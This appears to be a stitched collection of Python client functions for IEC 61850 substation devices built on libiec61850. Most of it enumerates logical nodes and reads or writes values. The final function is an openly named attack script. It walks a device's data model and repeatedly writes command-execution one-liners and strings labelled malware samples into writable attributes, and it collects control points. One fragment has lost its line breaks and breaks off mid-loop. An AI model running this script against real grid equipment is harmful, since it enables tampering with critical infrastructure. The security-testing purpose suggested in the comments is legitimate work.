def getLNlist_fromIED(ip):
    """Return the names of all logical nodes exposed by the IED at ``ip``.

    Connects on the ``tcpPort`` name taken from the enclosing scope, walks
    every logical device and its directory, and gathers the node names in
    listing order.  If the connect call does not report ``IED_ERROR_OK`` the
    function prints "Connection error" and terminates the process with
    status -1.  The error codes returned by the two directory calls are not
    inspected.
    """
    node_names = []
    con = iec61850.IedConnection_create()
    connect_rc = iec61850.IedConnection_connect(con, ip, tcpPort)
    # The state is queried but plays no part in the decision below.
    iec61850.IedConnection_getState(con)

    if connect_rc != iec61850.IED_ERROR_OK:
        print("Connection error")
        sys.exit(-1)

    devices, _ = iec61850.IedConnection_getLogicalDeviceList(con)
    dev_cursor = iec61850.LinkedList_getNext(devices)
    iec61850.LinkedList_size(devices)
    while dev_cursor:
        dev_name = iec61850.toCharP(dev_cursor.data)
        nodes, _ = iec61850.IedConnection_getLogicalDeviceDirectory(
            con, dev_name)
        node_cursor = iec61850.LinkedList_getNext(nodes)
        while node_cursor:
            node_names.append(iec61850.toCharP(node_cursor.data))
            node_cursor = iec61850.LinkedList_getNext(node_cursor)
        # Each directory list is released as soon as it has been read.
        iec61850.LinkedList_destroy(nodes)
        dev_cursor = iec61850.LinkedList_getNext(dev_cursor)

    iec61850.LinkedList_destroy(devices)
    iec61850.IedConnection_close(con)
    iec61850.IedConnection_destroy(con)
    return node_names
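def testClient():
    """Exercise float reads and writes against the local test server.

    Two attributes of ``testmodelSENSORS/TTMP1`` are checked:

    * ``TmpSv.instMag.f`` (functional constraint MX) must be readable, and a
      client write to it must be refused with error code 21.
    * ``TmpSp.setMag.f`` (functional constraint SP) must be readable,
      writable, and must read back the value that was written.

    Prints "Connection error" and exits with status -1 when the connect call
    does not return ``IED_ERROR_OK``.
    """
    con = iec61850.IedConnection_create()
    error = iec61850.IedConnection_connect(con, "localhost", tcpPort)
    if error == iec61850.IED_ERROR_OK:
        # Measured value: read must succeed, write must be rejected.
        theVal = "testmodelSENSORS/TTMP1.TmpSv.instMag.f"
        theValType = iec61850.IEC61850_FC_MX
        temperatureValue = iec61850.IedConnection_readFloatValue(
            con, theVal, theValType)
        assert (temperatureValue[1] == 0)
        newValue = temperatureValue[0] + 10
        err = iec61850.IedConnection_writeFloatValue(con, theVal, theValType,
                                                     newValue)
        # NOTE(review): 21 should correspond to IED_ERROR_ACCESS_DENIED in
        # libiec61850's client error enum -- confirm against the bound
        # library version.  This is the access-control check of the test.
        assert (err == 21)

        # Setpoint: read, write, read back.
        theVal = "testmodelSENSORS/TTMP1.TmpSp.setMag.f"
        theValType = iec61850.IEC61850_FC_SP
        temperatureSetpoint = iec61850.IedConnection_readFloatValue(
            con, theVal, theValType)
        print(temperatureSetpoint)
        # Check the error code of the setpoint read that was just made,
        # not the stale code of the earlier measured-value read.
        assert (temperatureSetpoint[1] == 0)
        # The written value is still derived from the measured value + 10.
        newValue = temperatureValue[0] + 10
        err = iec61850.IedConnection_writeFloatValue(con, theVal, theValType,
                                                     newValue)
        assert (err == 0)
        temperatureSetpoint = iec61850.IedConnection_readFloatValue(
            con, theVal, theValType)
        print(temperatureSetpoint)
        assert (temperatureSetpoint[0] == newValue)
        iec61850.IedConnection_close(con)
    else:
        print("Connection error")
        sys.exit(-1)
    iec61850.IedConnection_destroy(con)
    print("client ok")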
def run_client(ip, dt, var):
    """Read one data attribute from an IED and print its value.

    ``dt`` selects the read that is issued for the object reference ``var``:
    'b' boolean (FC ST), 'f' float (FC MX), 't' timestamp (FC MX),
    'q' quality (FC MX).  Any other ``dt`` issues no read.

    The connect timeout is set to 2000 and the port comes from the
    ``tcpPort`` name in the enclosing scope.  If the connect call fails or
    the connection state is falsy, "Connection error status" is printed and
    the process exits with status -1.  The error code returned by each read
    is discarded, so the value is printed whether or not the read succeeded.
    """
    print(ip, dt, var)
    con = iec61850.IedConnection_create()
    iec61850.IedConnection_setConnectTimeout(con, 2000)
    connect_rc = iec61850.IedConnection_connect(con, ip, tcpPort)
    state = iec61850.IedConnection_getState(con)

    if connect_rc != iec61850.IED_ERROR_OK or not state:
        print("Connection error status")
        sys.exit(-1)

    print("Good connection")
    if dt == 'b':
        value, _ = iec61850.IedConnection_readBooleanValue(
            con, var, iec61850.IEC61850_FC_ST)
        print("booleanValue: ", value)
    elif dt == 'f':
        value, _ = iec61850.IedConnection_readFloatValue(
            con, var, iec61850.IEC61850_FC_MX)
        print("Analog Value: ", value)
    elif dt == 't':
        # The library fills this Timestamp object in place.
        stamp = iec61850.Timestamp()
        _value, _ = iec61850.IedConnection_readTimestampValue(
            con, var, iec61850.IEC61850_FC_MX, stamp)
        print("timeStampValue: ", iec61850.Timestamp_getTimeInSeconds(stamp))
    elif dt == 'q':
        value, _ = iec61850.IedConnection_readQualityValue(
            con, var, iec61850.IEC61850_FC_MX)
        print("qualityValue: ", value)

    # The connection is destroyed without a separate close call.
    iec61850.IedConnection_destroy(con)
    print("Client OK")
def __init__(self, ip='127.0.0.1', tcpPort=102):
    """Create an IED connection object and try to connect to ``ip:tcpPort``.

    The connect timeout is set to 2000 before connecting.  The connection
    handle, the timeout call's return value and the connect error code are
    stored on the instance.  A failed connect only prints the error code;
    any exception is caught and printed, so construction never raises from
    this block.
    """
    try:
        handle = iec61850.IedConnection_create()
        self.__con = handle
        self.__timeout = iec61850.IedConnection_setConnectTimeout(
            handle, 2000)
        self.__error = iec61850.IedConnection_connect(handle, ip, tcpPort)
        if self.__error != iec61850.IED_ERROR_OK:
            # The message text is Russian for "error".
            print("ошибка", self.__error)
        else:
            # Local assignment only; nothing else in this method reads it.
            running = 1
    except Exception as exc:
        print('Connection exception: ', str(exc))
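def main():
    """Print the logical devices of the IED at 192.168.1.41, port 102.

    Connects, lists the logical devices and prints one "LD: <name>" line per
    device.  Each device's directory is still requested, as before, but its
    list is now released instead of leaked.  When the connect call does not
    return ``IED_ERROR_OK`` the function prints "Connection error" and
    returns without touching the device list.  The connection is closed and
    destroyed before returning.
    """
    con = iec61850.IedConnection_create()
    err = iec61850.IedConnection_connect(con, "192.168.1.41", 102)
    if err != iec61850.IED_ERROR_OK:
        # Without a connection the directory calls have nothing valid to
        # return, so stop here and release the handle.
        print("Connection error")
        iec61850.IedConnection_destroy(con)
        return

    [deviceList, err] = iec61850.IedConnection_getLogicalDeviceList(con)
    device = iec61850.LinkedList_getNext(deviceList)
    while device:
        print("LD: {}".format(iec61850.toCharP(device.data)))
        [LN, err] = iec61850.IedConnection_getLogicalDeviceDirectory(
            con, iec61850.toCharP(device.data))
        if LN:
            # The directory list is owned by the caller; free it per device.
            iec61850.LinkedList_destroy(LN)
        device = iec61850.LinkedList_getNext(device)
    iec61850.LinkedList_destroy(deviceList)
    iec61850.IedConnection_close(con)
    iec61850.IedConnection_destroy(con)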
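def checkConnected(ip):
    """Report whether an MMS connection to ``ip`` can be established.

    Connects on the ``tcpPort`` name from the enclosing scope and returns
    ``True`` when the connect call reports ``IED_ERROR_OK``, ``False``
    otherwise.  If the library raises, "Connection error" is printed and the
    process exits with status -1.

    The connection handle is released on every path, including the exit
    path: the original placed the destroy call after ``sys.exit`` where it
    could never run.
    """
    con = None
    try:
        con = iec61850.IedConnection_create()
        error = iec61850.IedConnection_connect(con, ip, tcpPort)
        return error == iec61850.IED_ERROR_OK
    except Exception:
        print("Connection error")
        sys.exit(-1)
    finally:
        # Runs for the normal return and for the SystemExit raised above.
        if con is not None:
            iec61850.IedConnection_destroy(con)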
def install_handler1(self):
    # Connects to a local IED, installs self.func_handler as a report
    # callback through a ctypes call into the native library, enables the
    # buffered report control block, then waits for keyboard input before
    # closing the connection.
    # NOTE(review): statement nesting is reconstructed from a listing that
    # lost its line breaks -- confirm against the original file.
    print("Start")
    hostname = "localhost"
    tcpPort = 102
    con = iec61850.IedConnection_create()
    error = iec61850.IedConnection_connect(con, hostname, tcpPort)
    # The connect result is printed but not checked; everything below runs
    # even when the connection failed.
    print(str(error))
    # C callback prototype: returns nothing, takes two void pointers.
    CB_PROTO = CFUNCTYPE(None, c_void_p, c_void_p)
    # ctypes requires the callback object to stay referenced for as long as
    # native code may call it; here it lives until this function returns.
    cbinst = CB_PROTO(self.func_handler)
    val = c_int()
    # NOTE(review): native code is loaded from a hard-coded absolute path in
    # a user's home directory.  Whoever can write that file controls what
    # runs inside this process -- consider a configured, trusted location.
    api = CDLL("/home/ivan/Projects/libiec61850/build/src/libiec61850.so")
    ReportHandler = api.IedConnection_installReportHandlerAddr
    # NOTE(review): the first argument is declared c_uint.  If
    # IedConnection_ToAddress returns a pointer-sized value, a 32-bit
    # argument type would truncate it on 64-bit builds -- confirm against
    # the C prototype.
    ReportHandler.argtypes = [c_uint, c_char_p, c_char_p, CB_PROTO, c_void_p]
    ReportHandler.restype = None
    addr = iec61850.IedConnection_ToAddress(con)
    # The error returned with the RCB is overwritten later without a check;
    # rcb is used below regardless.
    rcb, error = iec61850.IedConnection_getRCBValues(
        con, "TEMPLATELD0/LLN0.BR.brcbST0101", None)
    print("RCB:" + str(rcb))
    rid = iec61850.ClientReportControlBlock_getRptId(rcb)
    print("OriginalID: " + rid)
    # The same control block in two notations: dotted reference and
    # '$'-separated identifier.
    rptRef = create_string_buffer(b"TEMPLATELD0/LLN0.BR.brcbST0101")
    rptID = create_string_buffer(b"TEMPLATELD0/LLN0$BR$brcbST0101")
    ReportHandler(addr, rptRef, rptID, cbinst, None)
    print("Enabled " + str(iec61850.ClientReportControlBlock_getRptEna(rcb)))
    # Ask for reports on data update and general interrogation, then enable.
    iec61850.ClientReportControlBlock_setTrgOps(
        rcb, iec61850.TRG_OPT_DATA_UPDATE | iec61850.TRG_OPT_GI)
    iec61850.ClientReportControlBlock_setRptEna(rcb, True)
    # Only the RptEna and TrgOps elements are written back to the server.
    error = iec61850.IedConnection_setRCBValues(
        con, rcb,
        iec61850.RCB_ELEMENT_RPT_ENA | iec61850.RCB_ELEMENT_TRG_OPS, True)
    print(error)
    if (error == iec61850.IED_ERROR_OK):
        print("Connection is OK")
    else:
        print("Connection error status")
    print("Enabled " + str(iec61850.ClientReportControlBlock_getRptEna(rcb)))
    # Blocks here; reports can reach the callback while waiting.
    input("Wait input ... ")
    iec61850.IedConnection_close(con)
    iec61850.IedConnection_destroy(con)
def run(self):
    """Create the IED connection and attempt to connect once.

    Uses ``self._ip`` and ``self._tcp_port`` with a connect timeout of 2000.
    The handle, the timeout call's return value and the connect error code
    are kept on the instance.  Every outcome -- success, refusal, or an
    exception from the library -- is reported at debug level only, and
    nothing is raised to the caller.
    """
    self.logger.debug("trying to connect...")
    try:
        handle = iec61850.IedConnection_create()
        self._con = handle
        self._timeout = iec61850.IedConnection_setConnectTimeout(handle, 2000)
        self._error = iec61850.IedConnection_connect(
            handle, self._ip, self._tcp_port)
        if self._error != iec61850.IED_ERROR_OK:
            self.logger.debug("no connection")
        else:
            self.logger.debug("connection established")
    except Exception as exc:
        self.logger.debug("problem with connection %s", exc)
sys.path.insert(0, "libiec61850/pyiec61850") import iec61850 from datetime import datetime def signal_handler(signal, frame): global running running =0 print('You pressed Ctrl+C!') if __name__=="__main__": now = datetime.now(); current_time = now.strftime("%H:%M:%S"); print("Starting Client At Time %s" % current_time); #Create Client Connection con = iec61850.IedConnection_create() error = iec61850.IedConnection_connect(con, "localhost", 8102); if (error == iec61850.IED_ERROR_OK): [deviceList, error] = iec61850.IedConnection_getLogicalDeviceList(con) device = iec61850.LinkedList_getNext(deviceList) print("Connected to Server.\n") #Show Logical Node, Logical Device and Data Object inside the Server while device: LD_name=iec61850.toCharP(device.data) print("LD: %s" % LD_name) [logicalNodes, error] = iec61850.IedConnection_getLogicalDeviceDirectory(con, LD_name) logicalNode = iec61850.LinkedList_getNext(logicalNodes) while logicalNode:
def main(host,port,attack,it,con):
    """Enumerate an IED's data model and run one of three write tests.

    The function connects to ``host:port``, walks logical devices, logical
    nodes and node variables, and collects variable names by suffix:
    ``visable_string_type`` suffixes for ``attack`` 1 and 2, and
    ``$Oper$ctlVal`` for ``attack`` 3.  For ``attack`` 1 and 2 it then writes
    every string from ``commands`` or ``malware_examples`` to each collected
    name as a VisibleString with functional constraint SP, ``it`` times over.
    ``attack`` 3 only prints the collected names.

    The code only stores text in data attributes.  Whether any of it is ever
    interpreted depends entirely on the server and on whatever consumes
    those attributes -- nothing here shows that.

    For defenders, the visible behaviour is a full directory walk from one
    client followed by a steady stream of MMS write requests (one every
    0.1 s) against name-plate, LogRef, DatSet and RptID attributes.
    Per-client write authorisation on the server and value validation on
    those attributes are the controls this exercise probes.

    NOTE(review): the ``con`` parameter is overwritten on entry and never
    read.  Statement nesting below is reconstructed from a listing that lost
    its line breaks -- confirm against the original file.  No close/destroy
    of the connection is visible in this part of the listing.
    """
    attack12 =[]
    # Name suffixes that select the write targets for attack 1 and 2.
    visable_string_type =['$NamPlt','$NamPlt$d','$NamPlt$IdNs','$NamPlt$swRev','$NamPlt$vendor','LogRef','DatSet','RptID']
    attack3 =[]
    # Command-execution one-liners in assorted languages, used as test
    # strings (source link follows the list).
    commands= [ 'return execl (\"/bin/pwd\", \"pwd\", NULL);', 'system((\"/bin/pwd\", \"pwd\", NULL);', 'popen((\"/bin/pwd\", \"pwd\", NULL);', 'fp = popen(\"/bin/ls /etc/\", \"r\");printf(\'%s\',fp);', 'fp = system(\'ls\');printf(\'%s\',fp);', 'sshell ss; ss.argv.insert(\"ls\");o_(ss.link);', 'CALL \"SYSTEM\" USING BY CONTENT \"ls\"', 'Run(@ComSpec & \" /c \" & \'pause\', \"\", @SW_HIDE)', 'system(\"pause\");', 'execute_process(COMMAND ls)', 'spawn,\"ls\",result', 'System runCommand(\"ls\") stdout println', 'var sh = new ActiveXObject(\"WScript.Sh\");sh.run(\"/c ls\");', '\"ls\" system.', 'run(\`ls\`)', 'r: 4:\"ls\"', '> (io:format (os:cmd \"ls -alrt\"))', 'drive1$ = left$(Drives$,1) run \"ls /\";drive1$;\"', 'print first butfirst shell [ls -a] ; ..', 'contents=$(shell cat foo) curdir=\`pwd\`'] #https://rosettacode.org/wiki/Execute_a_system_command
    # 32-character hex strings; presumably MD5 digests of samples -- only the
    # text of each digest is written, no file content.  TODO confirm origin.
    malware_examples=[ '414af3620d0843f07318a2a33f65667d', '0c8b4b357d4f059177ee752a2a3230a5', 'f16ea91bb744e4abf5b0424e2a7d9246', '902d64217c8a0968a7b24af3001abba5', 'e19167569032677bb8b8a8ce78af11f8', 'a787ba60426e50c77ac8cb0598b634af', 'b6c26bbaefdbabedfd71b537b1cd7586', 'cbf48f823c965b40b3cb1c31c9c51bf6', '465c25e393f2e15e337ce5ef817c839e', '7209054e29ea7ebfe0828b11609f0db0', '9f0bf21fd75f540dce7fc29da799cbe1', 'f4ecba48d00f3e86b7ff72bfccc03410', '417f692bf04685b1e282f2ea8d8933bb', '16ee94648fdb34280c838e522292070f', 'fe59c96c664cf49a857469fa4a37f646', '5fb781ff11297732851186f3f7ac4b6a', 'bf134af3a00189da424657a382913da5', '75b50a3fae06f054cf3f28d80cfa4e15', '71db409e39688340d0dffff94a012e2e', '3b3eaf98db1df32147aadccf66826025', '0199d9d68ec0af5819d6137feb04310e']
    #Create Client Connection
    con = iec61850.IedConnection_create()
    error = iec61850.IedConnection_connect(con, host,port);
    if (error == iec61850.IED_ERROR_OK):
        [deviceList, error] = iec61850.IedConnection_getLogicalDeviceList(con)
        device = iec61850.LinkedList_getNext(deviceList)
        print("Connected to Server.\n")
        #Show Logical Node, Logical Device and Data Object inside the Server
        while device:
            logical_device=iec61850.toCharP(device.data)
            print("Name of Logical Device: %s" % logical_device)
            [logicalNodes, error] = iec61850.IedConnection_getLogicalDeviceDirectory(con, logical_device)
            logicalNode = iec61850.LinkedList_getNext(logicalNodes)
            while logicalNode:
                LN_name=iec61850.toCharP(logicalNode.data)
                #print(" LN: %s" % LN_name)
                [LNobjects, error] = iec61850.IedConnection_getLogicalNodeVariables(con, logical_device+"/"+LN_name)
                LNobject = iec61850.LinkedList_getNext(LNobjects)
                while LNobject:
                    #print(" DO: %s" % iec61850.toCharP(LNobject.data))
                    # The cursor is advanced before it is read, so the last
                    # pass sees None; the resulting AttributeError is
                    # swallowed by the except clause below.
                    LNobject = iec61850.LinkedList_getNext(LNobject)
                    try:
                        #Attack1 and Attack2
                        if attack == 1 or attack == 2:
                            for i in visable_string_type:
                                if(str(iec61850.toCharP(LNobject.data)).endswith(i)):
                                    attack12.append(str(iec61850.toCharP(LNobject.data)))
                                    print(str(iec61850.toCharP(LNobject.data)))
                        #Attack3
                        if attack == 3:
                            if str(iec61850.toCharP(LNobject.data)).endswith('$Oper$ctlVal'):
                                attack3.append(str(iec61850.toCharP(LNobject.data)))
                                print(str(iec61850.toCharP(LNobject.data)))
                    except (TypeError, AttributeError):
                        pass
                iec61850.LinkedList_destroy(LNobjects)
                logicalNode = iec61850.LinkedList_getNext(logicalNode)
            iec61850.LinkedList_destroy(logicalNodes)
            device = iec61850.LinkedList_getNext(device)
        iec61850.LinkedList_destroy(deviceList)
        # SIGINT is routed to signal_handler, which is defined outside this
        # block.  NOTE(review): `running` is assigned here without a visible
        # `global` statement -- confirm the handler can actually stop the loop.
        running = 1;
        signal.signal(signal.SIGINT, signal_handler);
        sp=[]
        ps_r=[]
        sp_w =[]
        while running:
            if attack == 1:
                count = 0
                while count < it:
                    count+=1
                    k = 0
                    for item in attack12:
                        # logical_device still holds the name of the last
                        # device visited by the enumeration above.
                        lln_param = logical_device+"/"+item
                        type = iec61850.IEC61850_FC_SP #Function Code - Setpoint
                        for c in commands:
                            # The returned status is stored but never
                            # inspected, so the "Working" line below does not
                            # show whether the server accepted the write.
                            sp_w = iec61850.IedConnection_writeVisibleStringValue(con, lln_param, type, c)
                            print(k,"- Working:",lln_param,c)
                            time.sleep(0.1)
                            k+=1
                print("Finished Example Attack 1 - Command Injection")
                print("Attacked parameters:\n", attack12)
                break
            if attack == 2:
                count = 0
                while count < it:
                    count+=1
                    k = 0
                    for item in attack12:
                        lln_param = logical_device+"/"+item
                        type = iec61850.IEC61850_FC_SP #Function Code - Setpoint
                        for m in malware_examples:
                            # Same write path as attack 1, with the hex
                            # digest strings as the written value.
                            sp_w = iec61850.IedConnection_writeVisibleStringValue(con, lln_param, type, m)
                            print(k,"- Working:",lln_param,m)
                            time.sleep(0.1)
                            k+=1
                print("Finished Example Attack 2 - Malware Injection")
                print("Attacked parameters:\n", attack12)
                break
            #MMS Structure
            # Attack 3 performs no writes; it only prints the collected
            # control-value names.
            if attack == 3:
                print("attack 3 ................")
                print(attack3)
                break